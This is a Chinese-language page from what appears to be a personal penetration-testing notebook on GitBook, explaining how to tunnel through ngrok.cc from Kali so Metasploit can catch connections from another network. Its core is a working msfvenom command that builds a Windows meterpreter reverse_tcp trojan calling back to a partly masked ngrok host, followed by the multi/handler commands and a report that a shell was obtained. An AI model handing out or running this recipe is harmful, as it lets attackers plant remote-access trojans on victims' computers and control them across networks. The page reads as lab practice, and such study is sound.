wang kun' book
  • 目录
  • 环境配置
    • 2019年
      • Cobalt Strike kail的安装
      • vps配置ngrok反向代理
  • CTF WEB
    • 2019年
      • Spring boot SSTI
      • XML中XXE漏洞
        • XML和XXE基础
  • CTF Misc
    • 记一次PNG中的隐写
  • 渗透工具
    • Netcat
    • Metasploit
      • Untitled
      • Msfvenom常用payload
    • CobaltStrike生成windows木马
    • vps部署自动化src挖掘
    • SET社会工程工具包
  • 漏洞复现
    • CVE-2019-0708获取shell
  • hexo github搭建博客
    • 一. Hexo搭建个人博客
    • 二.Hexo添加主题
    • Hexo下的站点配置文件
    • 自定义主题
Powered by GitBook
On this page
  • 1.起因:
  • 2.更换ngrok.cc的客户端
  • 2.1 开通一个免费的隧道。
  • 2.2 开通你的隧道
  • 2.3管理隧道
  • 2.4 kali下安装客户端测试
  • 3.测试metasploit结合ngrok内网穿透
  • 3.1 生成木马(未免杀)
  • 3.2 使用Metasploit进行测试
  • 4.端口选择

Was this helpful?

  1. 环境配置
  2. 2019年

vps配置ngrok反向代理

作为内网用户我们有时需要本地WEB外网访问、本地开发微信、TCP端口转发,而ngrok能提供web的演示

PreviousCobalt Strike kail的安装NextCTF WEB

Last updated 5 years ago

Was this helpful?

1.起因:

自己搭建的ngrok挂掉了

2.1 开通一个免费的隧道。

2.2 开通你的隧道

隧道协议选tcp,之后要用metasploit结合ngrok

隧道名称随意

端口选择只要不是服务器端口就好

本地端口选择kali 的内网地址

2.3管理隧道

下载客户端

记录好隧道id

2.4 kali下安装客户端测试

安装路径下执行

root@kali:~# ./sunny clientid id

出现online表明成功

现在可以启用web,打开127.0.0.1:4040查看管理。需要设置apache2的端口为端口为kali内的端口,开启apache2的服务

3.测试metasploit结合ngrok内网穿透

3.1 生成木马(未免杀)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfen*** LPORT=123** -f exe > /root/Desktop/ngrok.exe

3.2 使用Metasploit进行测试

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.200.128(Kali的Linux内网IP)
set lport 1000 (隧道的端口号)
run

成功获取shell,不同网段。

4.端口选择

以下为服务端口,不可用选用

2.更换的客户端

ngrok.cc
选择免费的